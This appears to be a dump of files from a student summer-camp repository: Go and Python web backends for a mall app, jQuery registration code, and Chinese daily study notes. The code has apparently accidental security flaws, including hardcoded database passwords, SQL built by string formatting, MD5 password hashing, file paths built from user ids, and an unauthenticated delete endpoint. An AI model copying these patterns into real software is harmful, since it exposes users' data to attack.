c.JSON(http.StatusOK, u)\n//}\n\nfunc Login(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t\"name\": \"\",\n\t\t\"password\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\tfmt.Println(userInfo)\n\tvar u map[string]string\n\tif model.Login(userInfo) == 0 { //密码与账户匹配\n\t\tcookie := new(http.Cookie)\n\t\tcookie.Name = \"username\"\n\t\tcookie.Value = userInfo[\"name\"]\n\t\tcookie.Expires = time.Now().Add(24 * time.Hour)\n\t\tc.SetCookie(cookie)\n\n\t\tu = map[string]string{\n\t\t\t\"status\": \"yes\",\n\t\t}\n\t} else if model.Login(userInfo) == 1 { //有name但是pw不匹配\n\t\tu = map[string]string{\n\t\t\t \"status\":\"wrong pw\",\n\t\t}\n\t} else if model.Login(userInfo)==2{ //没有name\n\t\tu = map[string]string{\n\t\t\t\"status\": \"no user\",\n\t\t}\n\t}\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc SignUp(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t//\"id\": \"\",在数据库中会自动分配一个id所以在注册时可以不需要设置id\n\t\t\"password\": \"\",\n\t\t\"email\": \"\",\n\t\t\"phone\": \"\",\n\t\t\"name\": \"\",\n\t\t\"group\": \"\",\n\t\t\"identity\": \"\",\n\t\t\"status\": \"0\", //此时成员的状态还未被验证\n\t}\n\tc.Bind(&userInfo)\n\tfmt.Println(userInfo)\n\tvar u map[string]string\n\tif model.SignUp(userInfo) == 0 {\n\t\tu = map[string]string{\n\t\t\t\"status\": \"yes\",\n\t\t}\n\t} else if model.SignUp(userInfo) == 1 {\n\t\tu = map[string]string{\n\t\t\t\"status\": \"already have\",\n\t\t}\n\t} else if model.SignUp(userInfo) == 2{\n\t\tu = map[string]string{\n\t\t\t\"status\": \"incomplete data\",\n\t\t}\n\t}\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc DeleteMember(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t//\"id\": \"\",\n\t\t//\"password\": \"\",\n\t\t//\"email\": \"\",\n\t\t//\"phone\": \"\",\n\t\t \"name\": \"\",\n\t\t//\"group\": \"\",\n\t\t//\"identity\": \"\",\n\t\t//\"status\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\tmodel.DeleteMember(userInfo)\n\n\t\tu := map[string]string{\n\t\t\t\"status\": 
\"yes\",\n\t\t}\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc ShowGroup(c echo.Context) error {\n\t//Request(c)\n\tuserGroup := map[string]string{\n\t\t\"group\": \"\",\n\t}\n\tc.Bind(&userGroup)\n\tvar user []model.User\n\tuser = model.ShowGroup(userGroup)\n\tu := &user\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc GetInformation(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t\"information\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\tvar member []model.User\n\tmember=model.GetInformation(userInfo)\n\tu :=&member\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc AddGroup(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t//\"id\": \"\",\n\t\t//\"password\": \"\",\n\t\t//\"email\": \"\",\n\t\t//\"phone\": \"\",\n\t\t \"name\": \"\",\n\t\t \"group\": \"\",\n\t\t//\"identity\": \"\",\n\t\t \"status\": \"1\",\n\t}\n\tc.Bind(&userInfo)\n\tmodel.AddGroup(userInfo)\n\treturn c.NoContent(http.StatusOK)\n}\n\nfunc ChangeInformation(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t\"id\": \"\",\n\t\t\"password\": \"\",\n\t\t\"email\": \"\",\n\t\t\"phone\": \"\",\n\t\t\"name\": \"\",\n\t\t\"group\": \"\",\n\t\t\"identity\": \"\",\n\t\t\"status\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\tmodel.ChangeInformation(userInfo)\n\treturn c.NoContent(http.StatusOK)\n}\n" }, { "alpha_fraction": 0.5388383269309998, "alphanum_fraction": 0.5507347583770752, "avg_line_length": 27.203947067260742, "blob_id": "98f902635bfe34fc6ad70cb5ae2d5cb9bc8cfd03", "content_id": "1c0107db1a47062bd0fe9f365a2739442ea6584e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4903, "license_type": "no_license", "max_line_length": 105, "num_lines": 152, "path": "/Old-Li883/mall/model/merchant.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "\"\"\"\n商家操作\n注册商家\n注册,下架,查看物品\n修改自己,物品信息\n\"\"\"\n\nfrom util.response import response\nimport pymysql\n\ndb 
= pymysql.connect(\n host=\"127.0.0.1\", user=\"root\", db=\"mall\", passwd=',lch980929')\ncursor = db.cursor()\n\n\ndef m_register(id, password, email, addr):\n cursor.execute(\"select * from merchant where id=%s\", id)\n if cursor.fetchone() == (None):\n cursor.execute(\n \"insert into merchant(id,password,email,identify,addr) values(%s,%s,%s,%s,%s)\",\n (\n id,\n password,\n email,\n 0,\n addr,\n ))\n db.commit()\n return response(200)\n else:\n return response(400, \"id has been used\")\n\n\ndef add_commodity(id, price, clss, photo, commodity_rest, merchant_id):\n cursor.execute(\"select * from commodity where id=%s and merchant_id=%s\", (\n id,\n merchant_id,\n ))\n if cursor.fetchone() != (None): # 判断id是否已经存在\n return response(400, \"id has been used\")\n f1 = open(\n '/home/oldli/weblearning/flask/project/mall/photo/' + id + '.jpg',\n 'w') # 以wb形式打开若文件不存在则会自动生成\n f1.write(photo)\n f1.close()\n photo_path = '127.0.0.1/' + id + '.jpg' # 从前端传来文件的数据,存储在本地,前段再次调用时用nginx静态文件来获取\n cursor.execute(\n \"insert into commodity(id,price,cls,photo,commodity_rest,merchant_id) values(%s,%s,%s,%s,%s,%s)\",\n (\n id,\n price,\n clss,\n photo_path,\n commodity_rest,\n merchant_id,\n ))\n db.commit()\n return response(200)\n\n\ndef de_commodity(id, merchant_id):\n \"\"\" \n 商家下架商品\n 用户收藏商品下架提醒\n \"\"\"\n\n cursor.execute(\"select * from commodity where id=%s and merchant_id=%s\", (\n id,\n merchant_id,\n ))\n if cursor.fetchone() != (None):\n cursor.execute(\"delete from commodity where id=%s and merchant_id=%s\",\n (id, merchant_id))\n db.commit()\n cursor.execute(\"select c_id from favourites where m_id=%s\",\n id) # 进入该用户的消息盒子,在下一次打开该用户是发送消息给这个用户\n for i in cursor.fetchall(): # 进入每个用户的消息盒子\n cursor.execute(\n \"insert into message%s(message) values('You favourite has obtained')\"\n % i[0])\n return response(200)\n else:\n return response(400, \"This commodity has not exist\")\n\n\ndef check_commodity(merchant_id):\n \"\"\"\n 查找这个商家的所有商品\n \"\"\"\n\n cursor.execute(\"select * 
from commodity where merchant_id=%s\", merchant_id)\n commodity = []\n for t in cursor.fetchall():\n commodity.append(t)\n return response(200, commodity)\n\n\ndef modify_merchant(id, password, email, addr):\n \"\"\"\n id作为唯一标识符,在这里不能被修改\n 这里不会有用户不存在的情况,因为必须先登录才可能修改资料\n \"\"\"\n cursor.execute(\n \"update merchant set password=%s,email=%s,addr=%s where id=%s\", (\n password,\n email,\n addr,\n id,\n ))\n db.commit()\n return response(200)\n\n\ndef modify_commodity(id, price, clss, photo, commodity_rest, merchant_id):\n \"\"\"\n 修改商品信息\n 这里的商家id不变,因为商品永远属于当前商家\n \"\"\"\n cursor.execute(\n \"select price from commodity where id=%s and merchant_id=%s\", (\n id,\n merchant_id,\n ))\n pri = cursor.fetchone()\n p = pri[0]\n if p > price:\n cursor.execute(\"select c_id from favourites where m_id=%s\",\n (id, )) # 进入该用户的消息盒子,在下一次打开该用户是发送消息给这个用户\n mem = cursor.fetchall()\n for i in mem: # 进入每个用户的消息盒子\n m = i[0]\n cursor.execute(\n \"insert into message%s(message) values('You favourite thing price reduced')\"\n % m) # mysql语句中不能乱加单引号\n cursor.execute(\"select * from commodity where id=%s and merchant_id=%s\", (\n id,\n merchant_id,\n ))\n if cursor.fetchone() == (None): # 判断id是否存在\n return response(400, \"no this modity\")\n f1 = open('/home/oldli/weblearning/flask/project/mall/photo' + id + '.jpg',\n 'w') # 以wb形式打开若文件不存在则会自动生成,原来的数据会被抹去重新写\n f1.write(photo)\n cursor.execute(\n \"update commodity set price=%s,cls=%s,commodity_rest=%s where id=%s\", (\n price,\n clss,\n commodity_rest,\n id,\n ))\n db.commit()\n return response(200)\n" }, { "alpha_fraction": 0.6907545328140259, "alphanum_fraction": 0.6907545328140259, "avg_line_length": 25.885713577270508, "blob_id": "ac5246c8bf4c2b372d423702396d3a731a740873", "content_id": "955b92514132278e74a6e620325d6409d35909d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 951, "license_type": "no_license", "max_line_length": 78, "num_lines": 35, "path": 
"/Old-Li883/mall/views/administration_views.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import request\nfrom werkzeug.security import generate_password_hash\nfrom views import app\nfrom model.administration import a_register, identify, no_identity, prohibited\n\n\[email protected]('/api/administrator/register', methods=['post'])\ndef a_registration():\n data = request.get_json()\n id = data['id']\n pwd = data['password']\n password = generate_password_hash(pwd)\n email = data['email']\n return a_register(id, password, email)\n\n\[email protected]('/api/administrator/identification', methods=['post'])\ndef identification():\n data = request.get_json()\n id = data['id']\n identity = data['identity']\n return identify(id, identity)\n\n\[email protected]('/api/administrator/noidentify')\ndef find_no_identify():\n return no_identity()\n\n\[email protected]('/api/administrator/prohibit')\ndef prohibit():\n data = request.get_json()\n id = data['id']\n identity = data['identity'] # 是哪个组的\n return prohibited(id, identity)\n" }, { "alpha_fraction": 0.5992779731750488, "alphanum_fraction": 0.6173285245895386, "avg_line_length": 14.416666984558105, "blob_id": "dfa1ec469e5bcee9cd976505375c5036b2083394", "content_id": "3571f611c9e1b63a9faa0d0177bf8f8d02960972", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 602, "license_type": "no_license", "max_line_length": 39, "num_lines": 36, "path": "/jackwener/server/mall/encryptions/salt.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package encryptions\n\nimport (\n\t\"crypto/md5\"\n\t\"io\"\n\t\"fmt\"\n\t\"bytes\"\n\t\"encoding/hex\"\n)\n\nfunc Salt(password string) (string){\n\t// 计算密码MD5\n\tc := md5.New()\n\tio.WriteString(c, password)\n\tspw := fmt.Sprintf(\"%x\\n\", c.Sum(nil))\n\n\t// 指定两个(salt)\n\tsalt1 := \"@#$%\"\n\tsalt2 := \"^&*()\"\n\n\t// 拼接密码MD5\n\tbuf := 
bytes.NewBufferString(\"\")\n\n\t// 拼接密码\n\tio.WriteString(buf, salt1)\n\tio.WriteString(buf, spw)\n\tio.WriteString(buf, salt2)\n\n\t// 拼接密码计算MD5\n\tt := md5.New()\n\tio.WriteString(t, buf.String())\n\n\t// 输出\n\tfmt.Printf(\"%x\\n\", t.Sum(nil))\n\treturn hex.EncodeToString(t.Sum(nil))\n}" }, { "alpha_fraction": 0.7290836572647095, "alphanum_fraction": 0.7290836572647095, "avg_line_length": 21.909090042114258, "blob_id": "7b6be36858b5e53c4d2d9faf73981c6eb31306f3", "content_id": "acaeaaad1f6b0468ec70dab2ec5d7d491fdab434", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 251, "license_type": "no_license", "max_line_length": 77, "num_lines": 11, "path": "/jackwener/server/练手/routers/index.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"hello/controllers\"\n\t\"github.com/astaxie/beego\"\n)\n\nfunc IndexInit() {\n\tbeego.Router(\"/\", &controllers.UserController{}, \"get:PageLogin;post:Login\")\n\tbeego.Router(\"/register\", &controllers.UserController{}, \"post:Register\")\n}" }, { "alpha_fraction": 0.5573333501815796, "alphanum_fraction": 0.5640000104904175, "avg_line_length": 15.666666984558105, "blob_id": "b33982f9e7825ee2935f44ece61e9e069f409c68", "content_id": "d02fb790f9fb5cda413d5ece82a4f43ec24f56d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1138, "license_type": "no_license", "max_line_length": 62, "num_lines": 45, "path": "/yixiaoer/日报/7.11.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.11日报\n\n## 今日计划\n1. 数据库基本操作\n2. 
登陆及注册基本实现\n\n## 完成情况\n### 关于数据库\n* 增\n ```\n c := session.DB(\"A\").C(\"B\") //在数据库的A分支中创建一个B类\n err = c.Insert(&C) //在这个B类中加入数据C\n ```\n\n* 查\n ```\n c := session.DB(\"A\").C(\"B\") //数据库A分支的B类中\n\n var books []Book\n err := c.Find(bson.M{}).All(&C) //查找是否有C\n ```\n \n ```\n err := c.Find(bson.M{}).One(&C)\n ```\n\n* 删\n ```\n c := session.DB(\"store\").C(\"books\")\n err := c.Remove(bson.M{\"isbn\": isbn})\n ```\n* 改\n ```\n c := session.DB(\"store\").C(\"books\")\n err = c.Update(bson.M{\"isbn\": isbn}, &book)\n ```\n\n### 其他的一些莫名其妙的问题和记录\n* API就像是函数,封装好了一些方法\n* fetch由js进行,后端接收其中数据,通过json,但是emmm怎么处理QAQ(先强行知道叭,具体了解再说...)\n* form中的get/post和http,就可以直接通过这个传了吗(dei,但是传输也是json格式,所以还是要进行处理)\n\n低效且什么都不知道的一天OTZ😶\n明日继续\nto be continued👀\n" }, { "alpha_fraction": 0.7699999809265137, "alphanum_fraction": 0.800000011920929, "avg_line_length": 8, "blob_id": "344dddb2472622349e6e962a028b25d56a3ad301", "content_id": "0908adfcb5f23b39e1aa787911bb56a59e7a302a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 236, "license_type": "no_license", "max_line_length": 22, "num_lines": 11, "path": "/Shixiaoyanger/日报/7.14.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.14日报\n\n看了一部分session的内容\n\n今天赵楠给了建议后发现有些部分确实做得不够好\n\n今天又做了两件事\n\n一是看了一下go的与语言规范\n\n二是把原来杂乱的排版分了一下模块\n\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 3.6666667461395264, "blob_id": "dfa296f51ceb0a87424fefb8d4ab2ed2e77a747d", "content_id": "02f74aa759beb8569a81442257ef1416ab74cc28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25, "license_type": "no_license", "max_line_length": 6, "num_lines": 3, "path": "/Old-Li883/日报/7.9.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.9\n\n忙于工程实训" }, { "alpha_fraction": 0.6903225779533386, "alphanum_fraction": 0.7064515948295593, 
"avg_line_length": 18.680850982666016, "blob_id": "96fbf2ab3ef92be1ef71e8cec0ab71ff4f61cc16", "content_id": "90a3efcb9e853a5e00a2fe000baff32d36fe7e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1896, "license_type": "no_license", "max_line_length": 104, "num_lines": 47, "path": "/yixiaoer/日报/7.14.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.14日报\n\n## 今日计划\n* 接口测试了解\n* go语言规范\n* echo框架(实现登录)\n\n## 完成情况\n### 了解接口测试\n1. 接口(一般指以下两种)\n * API:应用程序编程接口(程序间的接口(此处说的接口特指API))\n * GUI:图形用户界面(人与程序的接口)\n2. 接口的分类\n * HTTP接口(走HTTP协议,通过路径来区分调用的方法,请求报文入参有多种形式,返回报文一般为json串,最常见的是get和post方法)\n * Webservice接口\n * RESTful接口\n2. 接口测试是用来检查各个组件的接口的测试,接口测试主要检查外部系统与系统之间以及各个子系统之间的交互点,测试的重点在数据的传递上,按约定的格式(接口)给待测软件传入某种数据,之后检查接口给的返回值是否正确\n3. 接口测试流程主要是执行+断言\n 断言如下内容:\n * 服务器状态,返回的代码,比如200,如果使用工具测试,就由工具就判断了\n * 数据错误:通过正则或者其他的手段来处理\n * 超时错误\n \n### 建立一个工程\n1. project\n * controller(与前端交互,处理前端传入的数据,路由处理)\n *user.go*\n * model(编写程序应有的功能,与数据库建立连接)\n *user.go*\n * view\n *user.go*\n * main.go(创建web serve和路由)\n2. init函数(会在每个包完成初始化后自动执行,并且执行优先级比main函数高)\n* 通常被用来:\n * 对变量进行初始化\n * 检查/修复程序的状态\n * 注册\n * 运行一次计算\n\n### 利用框架来实现登陆\n1. echo.Context里面包含很多很多东西,嗯\n2. 在response时发送json格式更方便前端,当传输数据时只是一个状态时,可以用“status-true/false”来传输\n3. func(c echo.Context)格式不可以改变\n\n\n明日继续\nto be continued\n\n\n\n\n\n" }, { "alpha_fraction": 0.5647059082984924, "alphanum_fraction": 0.6176470518112183, "avg_line_length": 10.333333015441895, "blob_id": "7b71cb93e988a1add65f0d0678e559496eb28988", "content_id": "639e2caa6ec607cb578f27b91f95efbe89f1a4d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 327, "license_type": "no_license", "max_line_length": 24, "num_lines": 15, "path": "/yixiaoer/日报/7.19.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.19日报\n\n## 今日计划\n* 完成基本功能的后台部分\n\n## 完成情况\n### 遇到的一些情况\n1. 
403的解决\n * user 【用户名】 【**用户组**】\n2. openSSL\n * 公钥和私钥生成,进行非对称加密\n 3. 用不可逆加密来进行登陆与注册(比对法)\n \n明日继续\nto be continued😶\n" }, { "alpha_fraction": 0.6739130616188049, "alphanum_fraction": 0.760869562625885, "avg_line_length": 8.399999618530273, "blob_id": "cb491b12daa058bfff330f7e236fa6c409bc358b", "content_id": "638a81375b6ff4b7bd99c16848d7fd6fe6e73dcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 92, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/Old-Li883/日报/7.21.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.21\n\n学习js\n\n明日计划:;理解ajax,看fetch文档,尝试着画一些h5页面" }, { "alpha_fraction": 0.6571428775787354, "alphanum_fraction": 0.7428571581840515, "avg_line_length": 4.142857074737549, "blob_id": "a9ffd55aeb305186f9e27e57638ffcb3ba0f2aa0", "content_id": "454606442a2aa26d09f692eb2b72b9c4dc454b8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 61, "license_type": "no_license", "max_line_length": 10, "num_lines": 7, "path": "/Old-Li883/日报/7.14.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.14\n\n学习json\n\npython代码规范\n\n第一个后台函数" }, { "alpha_fraction": 0.7400000095367432, "alphanum_fraction": 0.7400000095367432, "avg_line_length": 41.92856979370117, "blob_id": "2540bed8985a00ba8841ee98c084e1d4026fed5f", "content_id": "f54942c59dcf02bbd2c91036310ca05c72831f9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 600, "license_type": "no_license", "max_line_length": 88, "num_lines": 14, "path": "/jackwener/server/mall/routers/goods.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"mall/controllers\"\n\t\"github.com/astaxie/beego\"\n)\nfunc init() {\n\tbeego.Router(\"/api/goods/kind\", &controllers.MainController{}, 
\"post:KindSearch\")\n\tbeego.Router(\"/api/goods/local\", &controllers.MainController{}, \"post:LocalSearch\")\n\tbeego.Router(\"/api/goods/:good\", &controllers.MainController{}, \"get:Goods\")\n\tbeego.Router(\"/api/goods/:good/picture\", &controllers.MainController{}, \"post:Picture\")\n\tbeego.Router(\"/api/goods/recent\", &controllers.MainController{}, \"get:RecentSearch\")\n\tbeego.Router(\"/api/goods/popular\", &controllers.MainController{}, \"get:PopularSearch\")\n}" }, { "alpha_fraction": 0.37142857909202576, "alphanum_fraction": 0.4571428596973419, "avg_line_length": 5.800000190734863, "blob_id": "a945726d3f771993a9ebdb0e6e5154a9c3caa68d", "content_id": "c3c3c835c58a4c1ee05c993d2798d40c9f7a45e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 61, "license_type": "no_license", "max_line_length": 14, "num_lines": 5, "path": "/Shixiaoyanger/日报/7.15.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.15日报\n\n放假\n\n装了一天linux。。。。。\n\n" }, { "alpha_fraction": 0.6360673308372498, "alphanum_fraction": 0.6458446383476257, "avg_line_length": 19.46666717529297, "blob_id": "e03608bb2b8c7fa8b66519fd5c95809c1c53a2dd", "content_id": "4f36a6ad25dc558dbf5297230eb1c9e606a0b385", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1857, "license_type": "no_license", "max_line_length": 80, "num_lines": 90, "path": "/Shixiaoyanger/market/models/User.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\nimport (\n\t\"fmt\"\n\t\"github.com/astaxie/beego/orm\"\n)\nfunc RegisterDB(){\n orm.RegisterDriver(\"mysql\", orm.DRMySQL)\n orm.RegisterDataBase(\"default\", \"mysql\", \"root:123456@/market?charset=utf8\")\n\n orm.RegisterModel(new(User),new(Goods) )\n}\n \n\ntype User struct{\n\tId int64 // `json:\"-\"` \n Username string `json:\"Username\"`\n Password string `json:\"password\"`\n 
Tel string `json:\"tel\"`\n\tViews int64 `json:\"views\"`\n\t\n}\ntype Users struct{\n\tUser *User\n\n\n}\n//locate User by username\nfunc ReadUser(user *User) error{\n\to := orm.NewOrm()\n\tqs := o.QueryTable(\"user\")\n\terr := qs.Filter(\"username\",user.Username).One(user)\n\treturn err\n\t//err == nil username has existed\n\t//err!= nil .....not exist\n\n}\n\n//注册添加数据成员\nfunc AddUser(user *User) (bool,error){\n\to := orm.NewOrm()\n\terr := ReadUser(user)\n\tif err == nil{\n\t\treturn false, err //username has existed\n\t}\n\tuser.Password = GetDes(user.Password)\n\t_,err =o.Insert(user)\n\tif err != nil{\n\t\treturn false, err //faild to insert\n\t}\n\treturn true, nil\n}\n\nfunc UpdateUser(user *User) error{\n\to := orm.NewOrm()\n\terr := ReadUser(user)\n\tif err != nil{\n\t\treturn err//not exist\n\t}\n\t//num,err1 :=o.Update(&user,\"Tel\",)\n\tnum, err1 := o.QueryTable(\"user\").Update(orm.Params{\n\t\t\"views\": orm.ColValue(orm.ColAdd, 100),\n\t})\n\tfmt.Println(\"num\",num)\n\treturn err1 //update success\n}\n\nfunc IncreaseView(user *User) {\n\to := orm.NewOrm()\n\to.QueryTable(\"user\").Update(orm.Params{\n\t\t\"views\": orm.ColValue(orm.ColAdd, 1),\n\t})\n}\n\n// search User, return info\nfunc FindbyUserame(username string) (bool, User){\n\to :=orm.NewOrm()\n\tvar user User\n\terr := o.QueryTable(\"user\").Filter(\"username\", username).One(&user)\n\treturn err!= orm.ErrNoRows, user\n}\n\nfunc DeleteUser(user *User) error {\n\to := orm.NewOrm()\n\t_,err := o.Delete(user)\n\tif err!= nil{\n\t\treturn err\n\t}\n\treturn nil\n}" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 5.333333492279053, "blob_id": "76dcb328c8419b38890497be65e0df954578c364", "content_id": "42a34433b5270c62ef0c8ff1819555748d15748f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 38, "license_type": "no_license", "max_line_length": 8, "num_lines": 3, "path": "/jackwener/日报/7.25.md", 
"repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.25日报\n\n继续写前端部分。" }, { "alpha_fraction": 0.7785714268684387, "alphanum_fraction": 0.8357142806053162, "avg_line_length": 45.66666793823242, "blob_id": "94f5c4fb6013a5954d924e2820b279a260e25621", "content_id": "4d43bb2d7c4a5f79d30147f53da820ac0ebe7930", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 382, "license_type": "no_license", "max_line_length": 129, "num_lines": 3, "path": "/jackwener/日报/7.16.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.16日报\n\n昨晚3点改完代码才睡,早上11.30才起床,下午想了下项目的思路,摸鱼有点严重....太困了,晚上是分享,感觉自己容易浪起来一定要控制自己的感觉,做东西的时候要严肃,脑子要清醒,多喝咖啡和红牛,一定注意不要浪,后面加紧项目的进度,多搜些东西看,多自己解决问题\n" }, { "alpha_fraction": 0.4375848174095154, "alphanum_fraction": 0.4457259178161621, "avg_line_length": 50.73684310913086, "blob_id": "0584b11b7032c73ab1ff68f5d1f7379b7c2a6ca7", "content_id": "e5cab16b98dfd88aa891476c0d1a552526ee53d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3046, "license_type": "no_license", "max_line_length": 109, "num_lines": 57, "path": "/Old-Li883/mall/js/registration.js", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "$(document).ready(function () {\n $('.who').click(function () {\n value = $(\"input:radio[name='who']:checked\").val();//注意作用域的问题,每一个回调函数一个作用域?\n if (value === \"1\") {\n $(\"#div1\").remove();\n $(\"h1\").after(\"<div id='div1'></div>\");\n $(\"div\").append(\"id:<input id='id' type='text' name='id'><br>\");\n $(\"div\").append(\"password:<input id='password' type='password' name='password'><br>\");\n $(\"div\").append(\"rewrite_password:<input id='rpassword' type='password' name='password'><br>\");\n $(\"div\").append(\"email:<input type='text' name='email'><br>\");\n $(\"div\").append(\"name:<input type='text' name='name'><br>\");\n 
$(\"div\").append(\"addr:<input type='text' name='addr'><br>\");\n $(\"div\").append(\"phone:<input type='text' name='phone'><br>\");\n $('#rpassword').blur(function () {//注意异步加载的问题\n $(\"#message\").remove();\n p1 = $('#password').val();\n p2 = $('#rpassword').val();\n if (p1 !== p2) {\n $(\"#rpassword\").after(\"<p id='message'>two password is not equal</p>\");\n }\n });\n }\n else if (value === \"2\") {\n $(\"#div1\").remove();\n $(\"h1\").after(\"<div id='div1'></div>\");\n $(\"div\").append(\"id:<input id='id' type='text' name='id'><br>\");\n $(\"div\").append(\"password:<input id='password' type='password' name='password'><br>\");\n $(\"div\").append(\"rewrite_password:<input id='rpassword' type='password' name='password'><br>\");\n $(\"div\").append(\"email:<input type='text' name='email'><br>\");\n $(\"div\").append(\"addr:<input type='text' name='addr'><br>\");\n $('#rpassword').blur(function () {//注意异步加载的问题\n $(\"#message\").remove();\n p1 = $('#password').val();\n p2 = $('#rpassword').val();\n if (p1 !== p2) {\n $(\"#rpassword\").after(\"<p id='message'>two password is not equal</p>\");\n }\n });\n }\n else if (value === \"3\") {\n $(\"#div1\").remove();\n $(\"h1\").after(\"<div id='div1'></div>\");\n $(\"div\").append(\"id:<input id='id' type='text' name='id'><br>\");\n $(\"div\").append(\"password:<input id='password' type='password' name='password'><br>\");\n $(\"div\").append(\"rewrite_password:<input id='rpassword' type='password' name='password'><br>\");\n $(\"div\").append(\"email:<input type='text' name='email'><br>\");\n $('#rpassword').blur(function () {//注意异步加载的问题\n $(\"#message\").remove();\n p1 = $('#password').val();\n p2 = $('#rpassword').val();\n if (p1 !== p2) {\n $(\"#rpassword\").after(\"<p id='message'>two password is not equal</p>\");\n }\n });\n }\n });\n});" }, { "alpha_fraction": 0.4962962865829468, "alphanum_fraction": 0.7111111283302307, "avg_line_length": 10.25, "blob_id": "945ece98baa46bb01f18ce41818d12f929e759b8", 
"content_id": "77ee9f11cf5f501bebd460add9b60dae271bfada", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 185, "license_type": "no_license", "max_line_length": 48, "num_lines": 12, "path": "/Old-Li883/日报/7.8.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "<<<<<<< HEAD\n# 7.8\n\n学习sqlalchemy并看了个相关示例\n\n明日计划:\n\n自己动手做一个相关的sqlalchemy\n=======\ndfjasd\n\n>>>>>>> a33ae2d7f6861a6b369cd48c770f99391491ba03\n" }, { "alpha_fraction": 0.71875, "alphanum_fraction": 0.7195723652839661, "avg_line_length": 19.576271057128906, "blob_id": "adc59658718c228c491ddb315e69c83af3a76e36", "content_id": "de49c12a23b49a92b65f327836ea499990787306", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1228, "license_type": "no_license", "max_line_length": 50, "num_lines": 59, "path": "/yixiaoer/server/src/project2/controller/commodity.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controller\n\nimport (\n\t\"github.com/labstack/echo\"\n\t\"project/project2/model\"\n\t\"net/http\"\n\t\"fmt\"\n)\n\nfunc ShowCategory(c echo.Context) error {\n\tCommodityCategory := map[string]string{\n\t\t\"类别\": \"\",\n\t}\n\tc.Bind(&CommodityCategory)\n\tfmt.Println(CommodityCategory)\n\tvar commodity []model.Commodity\n\tcommodity = model.ShowCategory(CommodityCategory)\n\tu := &commodity\n\tfmt.Println(commodity)\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc ShowLocation(c echo.Context) error {\n\tCommodityCategory := map[string]string{\n\t\t\"地域\": \"\",\n\t}\n\tc.Bind(&CommodityCategory)\n\tvar commodity []model.Commodity\n\tcommodity = model.ShowLocation(CommodityCategory)\n\tu := &commodity\n\treturn 